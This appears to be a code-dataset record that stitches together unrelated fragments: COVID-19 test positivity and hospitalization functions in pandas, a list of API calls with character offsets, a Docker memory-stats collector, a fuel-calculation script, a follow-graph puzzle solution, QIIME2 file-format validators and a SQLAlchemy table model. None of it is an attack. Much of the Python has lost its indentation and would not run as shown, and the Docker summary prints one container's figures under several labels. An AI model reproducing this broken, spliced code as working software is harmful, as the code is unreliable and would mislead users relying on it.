df['avg'] = a.apply(lambda x: (100* (x.positive_tests / (x.positive_tests + x.negative_tests))) if (x.positive_tests + x.negative_tests) > 0 else None, axis=1)
return df
"""
get_us_positivity
Constructs a data table of the entire US test positivity
start_date (datetime.date) : Starting date of table
end_date (datetime.date) : Ending date of table
returns: dataframe with date, test positivity
"""
def get_us_positivity(start_date = pd.Timestamp(2020,1,1), end_date = pd.Timestamp.today()):
curr_date = start_date
max_date = test_data.date.max()
lst = []
while (curr_date <= end_date and curr_date <= max_date):
test_data_curr = test_data[test_data.date==str(curr_date)]
test_pos = test_data_curr[test_data_curr.overall_outcome == "Positive"].new_results_reported
test_neg = test_data_curr[test_data_curr.overall_outcome == "Negative"].new_results_reported
pos_sum = test_pos.sum() if test_pos.any() else 0
        neg_sum = test_neg.sum() if test_neg.any() else 0
test_positivity = pos_sum / (pos_sum + neg_sum) * 100 if (pos_sum + neg_sum) > 0 else None
newRow = {"date": curr_date, "test_positivity": test_positivity, "positive_tests" : pos_sum, "negative_tests": neg_sum}
lst.append(newRow)
curr_date += datetime.timedelta(1)
df = pd.DataFrame(lst)
# Calculates 7-day averages of test positivity using sums over the window
a = df.rolling(7).sum()
df['avg'] = a.apply(lambda x: (100* (x.positive_tests / (x.positive_tests + x.negative_tests))) if (x.positive_tests + x.negative_tests) > 0 else None, axis=1)
return df
"""
get_all_state_hosps
Constructs a table of the most recent hospitalizations per capita for every State
returns: dataframe with state, hosp per million
"""
def get_all_state_hosps():
    state_hosps = pd.DataFrame(columns=['State', 'Hospitalizations per Million'])
for state in definitions.states.keys():
state_data = hhs_data[hhs_data.state.isin([state])]
state_data = state_data[state_data['date'] <= pd.Timestamp.today()]
hosps = state_data[state_data['date'] == state_data['date'].max()].inpatient_beds_used_covid.values
        if hosps.size == 0:
            hosps = False
else:
hosps = hosps[0]/definitions.populations[definitions.states[state]]*1000000
state_hosps = state_hosps.append({"State":state, "Hospitalizations per Million": float(hosps)}, ignore_index=True)
return state_hosps
"""
get_all_state_cases
Constructs a table of the most recent cases per capita for every State
returns: dataframe with state, cases per million
"""
def get_all_state_cases():
state_cases = pd.DataFrame(columns=['State', 'Cases'])
for state in definitions.states.keys():
state_data = get_state_cases([state], start_date=(pd.Timestamp.today() - pd.Timedelta(days=7)).date()) # adjust end date here
if state_data.empty:
cases = False
else:
cases = state_data.cases.sum() / len(state_data)
state_cases = state_cases.append({"State":state, "Cases": float(cases)}, ignore_index=True)
return state_cases
"""
get_all_state_rt
Constructs a table of the most recent rt for every State
returns: dataframe with state, rt
"""
def get_all_state_rt(avg=True):
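    # Rt is approximated as 1 + the 7-day percent change in hospitalizations
    # per capita: a rough growth proxy, not a formal reproduction-number
    # estimate.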
state_rt = pd.DataFrame(columns=['State', 'Rt'])
for state in definitions.states.keys():
data = get_state_hospitalizations(state_codes=[state], start_date=(pd.Timestamp.today() - pd.Timedelta(days=20)).date())
if data.empty:
rt = False
else:
rt= 1 + data.iloc[:,1].pct_change(periods=7)
if(avg):
y1 = rt.rolling(7).mean()
rt = y1.iloc[-1]
else:
rt = rt.iloc[-1]
state_rt = state_rt.append({"State":state, "Rt": float(rt)}, ignore_index=True)
return state_rt
|
[
"pandas.DataFrame",
"pandas.Timestamp",
"definitions.states.keys",
"pandas.read_csv",
"sodapy.Socrata",
"pandas.to_datetime",
"datetime.timedelta",
"pandas.DataFrame.from_records",
"pandas.Timedelta",
"pandas.concat",
"pandas.Timestamp.today"
] |
[((514, 625), 'pandas.read_csv', 'pd.read_csv', (['"""https://raw.githubusercontent.com/nytimes/covid-19-data/master/rolling-averages/us.csv"""'], {}), "(\n 'https://raw.githubusercontent.com/nytimes/covid-19-data/master/rolling-averages/us.csv'\n )\n", (525, 625), True, 'import pandas as pd\n'), ((637, 755), 'pandas.read_csv', 'pd.read_csv', (['"""https://raw.githubusercontent.com/nytimes/covid-19-data/master/rolling-averages/us-states.csv"""'], {}), "(\n 'https://raw.githubusercontent.com/nytimes/covid-19-data/master/rolling-averages/us-states.csv'\n )\n", (648, 755), True, 'import pandas as pd\n'), ((759, 790), 'sodapy.Socrata', 'Socrata', (['"""healthdata.gov"""', 'None'], {}), "('healthdata.gov', None)\n", (766, 790), False, 'from sodapy import Socrata\n'), ((1993, 2036), 'pandas.to_datetime', 'pd.to_datetime', (['hhs_provisional.update_date'], {}), '(hhs_provisional.update_date)\n', (2007, 2036), True, 'import pandas as pd\n'), ((2593, 2610), 'pandas.concat', 'pd.concat', (['frames'], {}), '(frames)\n', (2602, 2610), True, 'import pandas as pd\n'), ((2779, 2808), 'pandas.to_datetime', 'pd.to_datetime', (['hhs_data.date'], {}), '(hhs_data.date)\n', (2793, 2808), True, 'import pandas as pd\n'), ((2984, 3014), 'pandas.to_datetime', 'pd.to_datetime', (['test_data.date'], {}), '(test_data.date)\n', (2998, 3014), True, 'import pandas as pd\n'), ((3038, 3070), 'pandas.to_datetime', 'pd.to_datetime', (['nyt_data_us.date'], {}), '(nyt_data_us.date)\n', (3052, 3070), True, 'import pandas as pd\n'), ((3097, 3132), 'pandas.to_datetime', 'pd.to_datetime', (['nyt_data_state.date'], {}), '(nyt_data_state.date)\n', (3111, 3132), True, 'import pandas as pd\n'), ((3539, 3563), 'pandas.Timestamp', 'pd.Timestamp', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (3551, 3563), True, 'import pandas as pd\n'), ((3574, 3594), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (3592, 3594), True, 'import pandas as pd\n'), ((4326, 4343), 'pandas.DataFrame', 'pd.DataFrame', (['lst'], {}), '(lst)\n', (4338, 4343), True, 'import pandas as pd\n'), ((4375, 4399), 'pandas.Timestamp', 'pd.Timestamp', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (4387, 4399), True, 'import pandas as pd\n'), ((4410, 4430), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (4428, 4430), True, 'import pandas as pd\n'), ((4659, 4683), 'pandas.Timestamp', 'pd.Timestamp', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (4671, 4683), True, 'import pandas as pd\n'), ((4694, 4714), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (4712, 4714), True, 'import pandas as pd\n'), ((5446, 5463), 'pandas.DataFrame', 'pd.DataFrame', (['lst'], {}), '(lst)\n', (5458, 5463), True, 'import pandas as pd\n'), ((5496, 5520), 'pandas.Timestamp', 'pd.Timestamp', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (5508, 5520), True, 'import pandas as pd\n'), ((5531, 5551), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (5549, 5551), True, 'import pandas as pd\n'), ((5811, 5835), 'pandas.Timestamp', 'pd.Timestamp', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (5823, 5835), True, 'import pandas as pd\n'), ((5846, 5866), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (5864, 5866), True, 'import pandas as pd\n'), ((6633, 6650), 'pandas.DataFrame', 'pd.DataFrame', (['lst'], {}), '(lst)\n', (6645, 6650), True, 'import pandas as pd\n'), ((6756, 6780), 'pandas.Timestamp', 'pd.Timestamp', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (6768, 6780), True, 'import pandas 
as pd\n'), ((6791, 6811), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (6809, 6811), True, 'import pandas as pd\n'), ((7227, 7244), 'pandas.DataFrame', 'pd.DataFrame', (['lst'], {}), '(lst)\n', (7239, 7244), True, 'import pandas as pd\n'), ((7623, 7647), 'pandas.Timestamp', 'pd.Timestamp', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (7635, 7647), True, 'import pandas as pd\n'), ((7658, 7678), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (7676, 7678), True, 'import pandas as pd\n'), ((8808, 8825), 'pandas.DataFrame', 'pd.DataFrame', (['lst'], {}), '(lst)\n', (8820, 8825), True, 'import pandas as pd\n'), ((9353, 9377), 'pandas.Timestamp', 'pd.Timestamp', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (9365, 9377), True, 'import pandas as pd\n'), ((9388, 9408), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (9406, 9408), True, 'import pandas as pd\n'), ((10239, 10256), 'pandas.DataFrame', 'pd.DataFrame', (['lst'], {}), '(lst)\n', (10251, 10256), True, 'import pandas as pd\n'), ((10745, 10796), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['State', 'Hospitalizations']"}), "(columns=['State', 'Hospitalizations'])\n", (10757, 10796), True, 'import pandas as pd\n'), ((10814, 10839), 'definitions.states.keys', 'definitions.states.keys', ([], {}), '()\n', (10837, 10839), False, 'import definitions\n'), ((11579, 11619), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['State', 'Cases']"}), "(columns=['State', 'Cases'])\n", (11591, 11619), True, 'import pandas as pd\n'), ((11637, 11662), 'definitions.states.keys', 'definitions.states.keys', ([], {}), '()\n', (11660, 11662), False, 'import definitions\n'), ((12219, 12256), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['State', 'Rt']"}), "(columns=['State', 'Rt'])\n", (12231, 12256), True, 'import pandas as pd\n'), ((12274, 12299), 'definitions.states.keys', 'definitions.states.keys', ([], {}), '()\n', (12297, 12299), False, 'import definitions\n'), ((1002, 1036), 'pandas.DataFrame.from_records', 'pd.DataFrame.from_records', (['results'], {}), '(results)\n', (1027, 1036), True, 'import pandas as pd\n'), ((1258, 1297), 'pandas.DataFrame.from_records', 'pd.DataFrame.from_records', (['test_results'], {}), '(test_results)\n', (1283, 1297), True, 'import pandas as pd\n'), ((1801, 1839), 'pandas.DataFrame.from_records', 'pd.DataFrame.from_records', (['provisional'], {}), '(provisional)\n', (1826, 1839), True, 'import pandas as pd\n'), ((4293, 4314), 'datetime.timedelta', 'datetime.timedelta', (['(1)'], {}), '(1)\n', (4311, 4314), False, 'import datetime\n'), ((5413, 5434), 'datetime.timedelta', 'datetime.timedelta', (['(1)'], {}), '(1)\n', (5431, 5434), False, 'import datetime\n'), ((6600, 6621), 'datetime.timedelta', 'datetime.timedelta', (['(1)'], {}), '(1)\n', (6618, 6621), False, 'import datetime\n'), ((7194, 7215), 'datetime.timedelta', 'datetime.timedelta', (['(1)'], {}), '(1)\n', (7212, 7215), False, 'import datetime\n'), ((8776, 8797), 'datetime.timedelta', 'datetime.timedelta', (['(1)'], {}), '(1)\n', (8794, 8797), False, 'import datetime\n'), ((10208, 10229), 'datetime.timedelta', 'datetime.timedelta', (['(1)'], {}), '(1)\n', (10226, 10229), False, 'import datetime\n'), ((2326, 2342), 'pandas.read_csv', 'pd.read_csv', (['url'], {}), '(url)\n', (2337, 2342), True, 'import pandas as pd\n'), ((2425, 2447), 'pandas.Timestamp', 'pd.Timestamp', (['max_date'], {}), '(max_date)\n', (2437, 2447), True, 'import pandas as pd\n'), ((10955, 10975), 
'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (10973, 10975), True, 'import pandas as pd\n'), ((11722, 11742), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (11740, 11742), True, 'import pandas as pd\n'), ((11745, 11765), 'pandas.Timedelta', 'pd.Timedelta', ([], {'days': '(7)'}), '(days=7)\n', (11757, 11765), True, 'import pandas as pd\n'), ((12376, 12396), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (12394, 12396), True, 'import pandas as pd\n'), ((12399, 12420), 'pandas.Timedelta', 'pd.Timedelta', ([], {'days': '(20)'}), '(days=20)\n', (12411, 12420), True, 'import pandas as pd\n')]
|
import docker
import os
import glob
import json
import datetime
import numpy
client = docker.APIClient(base_url='unix://var/run/docker.sock')
def mem_stats(container_id):
docker_stats = client.stats(container_id, decode=True, stream=False)
mem_stats = docker_stats['memory_stats']
wanted_keys = ['usage', 'max_usage']
container_mem_stats = dict(
(k, mem_stats[k]) for k in wanted_keys if k in mem_stats.keys())
# ['stats']['rss']
container_mem_stats['name'] = docker_stats['name']
return container_mem_stats
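# Usage sketch, assuming a Docker daemon is reachable on the socket above:
#   first = client.containers()[0]['Id']
#   print(mem_stats(first))   # e.g. {'usage': ..., 'max_usage': ..., 'name': ...}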
def collect_stats(sockshop_containers, ntimes=1):
# {"name" : "component name", "timestamps": "datetime", "docker_stats":...}
stats_average = dict()
for c_id in sockshop_containers:
stats_average[c_id] = {"usage": [],
"max_usage": [], "rss": [], "total_rss": []}
for i in range(ntimes):
stats = []
for container_id in sockshop_containers:
docker_stats = client.stats(
container_id, decode=True, stream=False)
container_stats = dict()
container_stats["timestamp"] = datetime.datetime.now().isoformat()
container_stats["name"] = docker_stats['name']
container_stats["docker_stats"] = docker_stats
stats.append(container_stats)
# print(stats_average)
stats_average[container_id]['name'] = docker_stats['name']
stats_average[container_id]['usage'].append(
docker_stats['memory_stats']['usage'])
stats_average[container_id]['max_usage'].append(
docker_stats['memory_stats']['max_usage'])
stats_average[container_id]['rss'].append(
docker_stats['memory_stats']['stats']['rss'])
stats_average[container_id]['total_rss'].append(
docker_stats['memory_stats']['stats']['total_rss'])
with open("tosker_{0}.log".format(ntimes), 'w') as outfile:
json.dump(stats, outfile)
# print(stats_average)
n_containers = 0
for key, value in stats_average.items():
stats_average[key]["avg_usage"] = numpy.mean(value['usage'])
stats_average[key]["avg_max_usage"] = numpy.mean(value['max_usage'])
stats_average[key]["avg_rss"] = numpy.mean(value['rss'])
stats_average[key]["avg_total_rss"] = numpy.mean(value['total_rss'])
n_containers += 1
container_usage = max(stats_average.keys(), key=(
lambda k: stats_average[k]["avg_usage"]))
container_max_usage = max(stats_average.keys(), key=(
lambda k: stats_average[k]["avg_max_usage"]))
container_rss = max(stats_average.keys(), key=(
lambda k: stats_average[k]["avg_rss"]))
container_total_rss = max(stats_average.keys(), key=(
lambda k: stats_average[k]["avg_total_rss"]))
avg_usage = []
avg_max_usage = []
avg_rss = []
avg_total_rss = []
for key, value in stats_average.items():
avg_usage.append(value["avg_usage"])
avg_max_usage.append(value["avg_max_usage"])
avg_rss.append(value["avg_rss"])
avg_total_rss.append(value["avg_total_rss"])
# print(stats_average)
print(n_containers, "containers")
print("Usage :{0},\nMax usage:{1},\nRss:{2},\nTotal rss:{3}".format(
numpy.mean(avg_usage) / 1024 / 1024,
numpy.mean(avg_max_usage) / 1024 / 1024,
numpy.mean(avg_rss) / 1024 / 1024,
numpy.mean(avg_total_rss) / 1024 / 1024
))
print("Max containers: \n name {0} usage:{1},\n name {2} Max usage:{3},Name {4} Rss:{5}, \n Name {6} Total rss:{7}".format(
stats_average[container_usage]['name'], stats_average[container_usage]["avg_usage"] / 1024 / 1024,
stats_average[container_max_usage]['name'], stats_average[container_usage]["avg_max_usage"] / 1024 / 1024,
stats_average[container_rss]['name'], stats_average[container_usage]["avg_rss"] / 1024 / 1024,
stats_average[container_usage]['name'], stats_average[container_usage]["avg_total_rss"] / 1024 / 1024
))
# '{p[first]} {p[last]}'.format(p=person)
sockshop_dir = os.path.join(os.path.dirname(
os.path.abspath(__file__)), "sockshop-app")
print(sockshop_dir)
tosker_yaml_files = list()
os.chdir(sockshop_dir)
for tosker_file in glob.glob("*.yaml"):
tosker_yaml_files.append(os.path.join(sockshop_dir, tosker_file))
# run tosker
# for tosker_yaml_file in tosker_yaml_files:
# print("Starting {} yaml file ...".format(
# os.path.basename(os.path.normpath(tosker_yaml_file))))
# os.system("tosker {0} create start".format(tosker_yaml_file))
sockshop_containers = [container['Id'] for container in client.containers(
) if "sockshop" in container['Names'][0]]
# collect_stats(sockshop_containers, ntimes=3)
for i in map(mem_stats, sockshop_containers):
print(i)
# client.stats(client.containers()[0]['Id'], stream=False)['memory_stats']
# memory_stats :{
# 'limit': 8274780160,
# 'max_usage': 634081280,
# 'usage': 598896640
# 'stats': {'inactive_anon': 16384,
# 'rss': 53108736,
# 'total_rss': 53108736
# 'mapped_file': 4907008,
# 'dirty': 3379200,
# 'active_file': 395481088,
# 'unevictable': 0,
# 'total_writeback': 0,
# 'total_cache': 545763328, 'active_anon': 53432320, 'total_pgpgout': 1152618,
# 'total_active_file': 395481088,
# 'inactive_file': 149889024, 'writeback': 0, 'total_unevictable': 0,
# 'total_pgpgin': 1290140, 'rss_huge': 16777216, 'pgpgin': 1290140,
# 'total_dirty': 3379200, 'pgmajfault': 0, 'total_mapped_file': 4907008,
# 'cache': 545763328, 'total_inactive_file': 149889024,
# 'total_inactive_anon': 16384, 'total_pgfault': 1497954, 'total_active_anon': 53432320,
# 'total_rss_huge': 16777216, 'hierarchical_memory_limit': 9223372036854771712,
# 'total_pgmajfault': 0, 'pgfault': 1497954, 'pgpgout': 1152618
# },
# }
# {
# "storage_stats":{ },
# "memory_stats":{
# "name":"/sockshop_group-go.front-end-node",
# "cpu_stats":{ },
# "precpu_stats":{ },
# "read":"2017-11-10T09:39:58.567678054Z",
# "num_procs":0,
# "blkio_stats":{ },
# "networks":{ },
# "preread":"2017-11-10T09:39:57.56778472Z",
# "pids_stats":{ },
# "id":"b3b991051ff614137685ccd6cd57dd02e63aacfe1a22440b1d81024f7d644466"
# }
|
[
"json.dump",
"os.path.abspath",
"docker.APIClient",
"datetime.datetime.now",
"numpy.mean",
"glob.glob",
"os.path.join",
"os.chdir"
] |
[((87, 142), 'docker.APIClient', 'docker.APIClient', ([], {'base_url': '"""unix://var/run/docker.sock"""'}), "(base_url='unix://var/run/docker.sock')\n", (103, 142), False, 'import docker\n'), ((4274, 4296), 'os.chdir', 'os.chdir', (['sockshop_dir'], {}), '(sockshop_dir)\n', (4282, 4296), False, 'import os\n'), ((4316, 4335), 'glob.glob', 'glob.glob', (['"""*.yaml"""'], {}), "('*.yaml')\n", (4325, 4335), False, 'import glob\n'), ((2161, 2187), 'numpy.mean', 'numpy.mean', (["value['usage']"], {}), "(value['usage'])\n", (2171, 2187), False, 'import numpy\n'), ((2234, 2264), 'numpy.mean', 'numpy.mean', (["value['max_usage']"], {}), "(value['max_usage'])\n", (2244, 2264), False, 'import numpy\n'), ((2305, 2329), 'numpy.mean', 'numpy.mean', (["value['rss']"], {}), "(value['rss'])\n", (2315, 2329), False, 'import numpy\n'), ((2376, 2406), 'numpy.mean', 'numpy.mean', (["value['total_rss']"], {}), "(value['total_rss'])\n", (2386, 2406), False, 'import numpy\n'), ((4182, 4207), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (4197, 4207), False, 'import os\n'), ((4366, 4405), 'os.path.join', 'os.path.join', (['sockshop_dir', 'tosker_file'], {}), '(sockshop_dir, tosker_file)\n', (4378, 4405), False, 'import os\n'), ((2000, 2025), 'json.dump', 'json.dump', (['stats', 'outfile'], {}), '(stats, outfile)\n', (2009, 2025), False, 'import json\n'), ((1138, 1161), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1159, 1161), False, 'import datetime\n'), ((3328, 3349), 'numpy.mean', 'numpy.mean', (['avg_usage'], {}), '(avg_usage)\n', (3338, 3349), False, 'import numpy\n'), ((3373, 3398), 'numpy.mean', 'numpy.mean', (['avg_max_usage'], {}), '(avg_max_usage)\n', (3383, 3398), False, 'import numpy\n'), ((3422, 3441), 'numpy.mean', 'numpy.mean', (['avg_rss'], {}), '(avg_rss)\n', (3432, 3441), False, 'import numpy\n'), ((3465, 3490), 'numpy.mean', 'numpy.mean', (['avg_total_rss'], {}), '(avg_total_rss)\n', (3475, 3490), False, 'import numpy\n')]
|
#!/usr/bin/env python3
import pandas as pd
import numpy as np
# import module_mass file as a pd.DataFrame and name the column
input = pd.read_csv('input.txt', header=None)
input.columns = ['module_mass']
# calculate fuel needed: floor(mass / 3) - 2
input['fuel'] = input['module_mass'] / 3
input['fuel_round'] = input['fuel'].apply(np.floor)
input['fuel_needed'] = input['fuel_round'] - 2
print(input.fuel_needed.sum())
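# For reference, the same computation as a single vectorized expression
# (a sketch; assumes the same single-column 'input.txt' as above):
# print(int((np.floor(pd.read_csv('input.txt', header=None)[0] / 3) - 2).sum()))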
|
[
"pandas.read_csv"
] |
[((131, 168), 'pandas.read_csv', 'pd.read_csv', (['"""input.txt"""'], {'header': 'None'}), "('input.txt', header=None)\n", (142, 168), True, 'import pandas as pd\n')]
|
import sys
read = sys.stdin.buffer.read
readline = sys.stdin.buffer.readline
readlines = sys.stdin.buffer.readlines
sys.setrecursionlimit(10 ** 7)
n, q = map(int, readline().split())
# f[x][y] == 'Y' means user x follows user y
f = [['N'] * n for _ in range(n)]
for i in range(q):
s = list(map(int, readline().split()))
s[1] -= 1
    if s[0] == 1:  # query "1 a b": a follows b
s[2] -= 1
f[s[1]][s[2]] = 'Y'
    if s[0] == 2:  # query "2 a": a follows back everyone who follows a
for i in range(n):
if i == s[1]:
continue
if f[i][s[1]] == 'Y':
f[s[1]][i] = 'Y'
    if s[0] == 3:  # query "3 a": a follows the accounts followed by those a follows
b = []
for i in range(n):
if s[1] == i:
continue
if f[s[1]][i] == 'Y':
b.append(i)
a = set()
for check in b:
for i in range(n):
if check == i or i == s[1]:
continue
if f[check][i] == 'Y':
a.add(i)
for i in range(n):
if s[1] == i:
continue
if i in a:
f[s[1]][i] = 'Y'
for ans in f:
print(*ans, sep='')
|
[
"sys.setrecursionlimit"
] |
[((116, 146), 'sys.setrecursionlimit', 'sys.setrecursionlimit', (['(10 ** 7)'], {}), '(10 ** 7)\n', (137, 146), False, 'import sys\n')]
|
import pandas as pd
import re
import qiime2
import qiime2.plugin.model as model
from qiime2.plugin import SemanticType
from q2_types.feature_data import FeatureData
from qiime2.plugin import ValidationError
class UNIXListFormat(model.TextFileFormat):
def _validate_(self, level):
# any file with lines will be valid
return True
def to_list(self):
with self.open() as fh:
return [s.strip() for s in fh]
class IDMetadataFormat(model.TextFileFormat):
def _validate_(self, level):
try:
self.to_metadata()
except qiime2.metadata.MetadataFileError as md_exc:
raise model.ValidationError(md_exc) from md_exc
def to_metadata(self):
return qiime2.Metadata.load(str(self))
class IDSelectionDirFmt(model.DirectoryFormat):
included = model.File('included.txt', format=UNIXListFormat)
excluded = model.File('excluded.txt', format=UNIXListFormat)
metadata = model.File('metadata.tsv', format=IDMetadataFormat)
label = model.File('label.txt', format=UNIXListFormat)
class IDSelection:
def __init__(self, inclusion: pd.Series, metadata: qiime2.Metadata,
label: str):
self.inclusion = inclusion
self.metadata = metadata
self.label = label
Selection = SemanticType('Selection', variant_of=FeatureData.field['type'])
# modified from DNAFastaFormat in q2_types to allow lowercase characters
# https://github.com/qiime2/q2-types/blob/058ee0e40e38edaa02b1aad034df37456aeb4ddf/q2_types/feature_data/_format.py#L146
class GISAIDDNAFASTAFormat(model.TextFileFormat):
def _validate_lines(self, max_lines):
FASTADNAValidator = re.compile(
r'[ACGTURYKMSWBDHVNacgturykmswbdhvn\-\. ]+\r?\n?')
ValidationSet = frozenset(('A', 'C', 'G', 'T', 'U', 'R', 'Y', 'K', 'M',
'S', 'W', 'B', 'D', 'H', 'V', 'N', 'a', 'c',
'g', 't', 'u', 'r', 'y', 'k', 'm', 's', 'w',
'b', 'd', 'h', 'v', 'n', '-', '.', ' '))
last_line_was_ID = False
ids = {}
with open(str(self), 'rb') as fh:
try:
first = fh.read(6)
if first[:3] == b'\xEF\xBB\xBF':
first = first[3:]
# Empty files should validate
if first.strip() == b'':
return
if first[0] != ord(b'>'):
raise ValidationError("First line of file is not a valid "
"description. Descriptions must "
"start with '>'")
fh.seek(0)
for line_number, line in enumerate(fh, 1):
line = line.strip()
if line_number >= max_lines:
return
line = line.decode('utf-8-sig')
if line.startswith('>'):
if last_line_was_ID:
raise ValidationError('Multiple consecutive '
'descriptions starting on '
f'line {line_number-1!r}')
line = line.split()
if line[0] == '>':
if len(line) == 1:
raise ValidationError(
f'Description on line {line_number} is '
'missing an ID.')
else:
raise ValidationError(
f'ID on line {line_number} starts with a '
'space. IDs may not start with spaces')
if line[0] in ids:
raise ValidationError(
f'ID on line {line_number} is a duplicate of '
f'another ID on line {ids[line[0]]}.')
ids[line[0]] = line_number
last_line_was_ID = True
elif re.fullmatch(FASTADNAValidator, line):
last_line_was_ID = False
else:
for position, character in enumerate(line):
if character not in ValidationSet:
raise ValidationError(
f"Invalid character '{character}' at "
f"position {position} on line "
f"{line_number} (does not match IUPAC "
"characters for a DNA sequence).")
except UnicodeDecodeError as e:
raise ValidationError(f'utf-8 cannot decode byte on line '
f'{line_number}') from e
    def _validate_(self, level):
        level_map = {'min': 100, 'max': float('inf')}
        self._validate_lines(level_map[level])
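# Usage sketch (hedged): validating a FASTA file with the 'min' line budget.
# 'seqs.fasta' is a placeholder path, not part of this module:
# fmt = GISAIDDNAFASTAFormat('seqs.fasta', mode='r')
# fmt.validate(level='min')  # raises ValidationError on malformed input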
|
[
"re.fullmatch",
"qiime2.plugin.model.File",
"qiime2.plugin.ValidationError",
"qiime2.plugin.SemanticType",
"qiime2.plugin.model.ValidationError",
"re.compile"
] |
[((1310, 1373), 'qiime2.plugin.SemanticType', 'SemanticType', (['"""Selection"""'], {'variant_of': "FeatureData.field['type']"}), "('Selection', variant_of=FeatureData.field['type'])\n", (1322, 1373), False, 'from qiime2.plugin import SemanticType\n'), ((837, 886), 'qiime2.plugin.model.File', 'model.File', (['"""included.txt"""'], {'format': 'UNIXListFormat'}), "('included.txt', format=UNIXListFormat)\n", (847, 886), True, 'import qiime2.plugin.model as model\n'), ((902, 951), 'qiime2.plugin.model.File', 'model.File', (['"""excluded.txt"""'], {'format': 'UNIXListFormat'}), "('excluded.txt', format=UNIXListFormat)\n", (912, 951), True, 'import qiime2.plugin.model as model\n'), ((967, 1018), 'qiime2.plugin.model.File', 'model.File', (['"""metadata.tsv"""'], {'format': 'IDMetadataFormat'}), "('metadata.tsv', format=IDMetadataFormat)\n", (977, 1018), True, 'import qiime2.plugin.model as model\n'), ((1031, 1077), 'qiime2.plugin.model.File', 'model.File', (['"""label.txt"""'], {'format': 'UNIXListFormat'}), "('label.txt', format=UNIXListFormat)\n", (1041, 1077), True, 'import qiime2.plugin.model as model\n'), ((1690, 1754), 're.compile', 're.compile', (['"""[ACGTURYKMSWBDHVNacgturykmswbdhvn\\\\-\\\\. ]+\\\\r?\\\\n?"""'], {}), "('[ACGTURYKMSWBDHVNacgturykmswbdhvn\\\\-\\\\. ]+\\\\r?\\\\n?')\n", (1700, 1754), False, 'import re\n'), ((655, 684), 'qiime2.plugin.model.ValidationError', 'model.ValidationError', (['md_exc'], {}), '(md_exc)\n', (676, 684), True, 'import qiime2.plugin.model as model\n'), ((2496, 2604), 'qiime2.plugin.ValidationError', 'ValidationError', (['"""First line of file is not a valid description. Descriptions must start with \'>\'"""'], {}), '(\n "First line of file is not a valid description. Descriptions must start with \'>\'"\n )\n', (2511, 2604), False, 'from qiime2.plugin import ValidationError\n'), ((4850, 4916), 'qiime2.plugin.ValidationError', 'ValidationError', (['f"""utf-8 cannot decode byte on line {line_number}"""'], {}), "(f'utf-8 cannot decode byte on line {line_number}')\n", (4865, 4916), False, 'from qiime2.plugin import ValidationError\n'), ((4194, 4231), 're.fullmatch', 're.fullmatch', (['FASTADNAValidator', 'line'], {}), '(FASTADNAValidator, line)\n', (4206, 4231), False, 'import re\n'), ((3067, 3162), 'qiime2.plugin.ValidationError', 'ValidationError', (['f"""Multiple consecutive descriptions starting on line {line_number - 1!r}"""'], {}), "(\n f'Multiple consecutive descriptions starting on line {line_number - 1!r}')\n", (3082, 3162), False, 'from qiime2.plugin import ValidationError\n'), ((3903, 4010), 'qiime2.plugin.ValidationError', 'ValidationError', (['f"""ID on line {line_number} is a duplicate of another ID on line {ids[line[0]]}."""'], {}), "(\n f'ID on line {line_number} is a duplicate of another ID on line {ids[line[0]]}.'\n )\n", (3918, 4010), False, 'from qiime2.plugin import ValidationError\n'), ((3434, 3505), 'qiime2.plugin.ValidationError', 'ValidationError', (['f"""Description on line {line_number} is missing an ID."""'], {}), "(f'Description on line {line_number} is missing an ID.')\n", (3449, 3505), False, 'from qiime2.plugin import ValidationError\n'), ((3654, 3759), 'qiime2.plugin.ValidationError', 'ValidationError', (['f"""ID on line {line_number} starts with a space. IDs may not start with spaces"""'], {}), "(\n    f'ID on line {line_number} starts with a space. IDs may not start with spaces'\n  )", (3669, 3759), False, 'from qiime2.plugin import ValidationError\n'), ((4477, 4637), 'qiime2.plugin.ValidationError', 'ValidationError', (['f"""Invalid character \'{character}\' at position {position} on line {line_number} (does not match IUPAC characters for a DNA sequence)."""'], {}), '(\n f"Invalid character \'{character}\' at position {position} on line {line_number} (does not match IUPAC characters for a DNA sequence)."\n )\n', (4492, 4637), False, 'from qiime2.plugin import ValidationError\n')]
|
"""
** Copyright 2021 Bloomberg Finance L.P.
**
** Licensed under the Apache License, Version 2.0 (the "License");
** you may not use this file except in compliance with the License.
** You may obtain a copy of the License at
**
** http://www.apache.org/licenses/LICENSE-2.0
**
** Unless required by applicable law or agreed to in writing, software
** distributed under the License is distributed on an "AS IS" BASIS,
** WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
** See the License for the specific language governing permissions and
** limitations under the License.
"""
from sqlalchemy import JSON, Column, ForeignKey, String
from sqlalchemy.orm import declarative_base
from sqlalchemy.sql.sqltypes import BigInteger
from ._query_metrics import InitialQueryMetrics
Base = declarative_base()
class _OperatorSummariesInitial:
id = Column("id", BigInteger, autoincrement=True, primary_key=True)
operatorSummary = Column("operatorSummary", JSON(none_as_null=True), nullable=False)
class OperatorSummariesInitial(Base, _OperatorSummariesInitial):
__tablename__ = "operator_summaries"
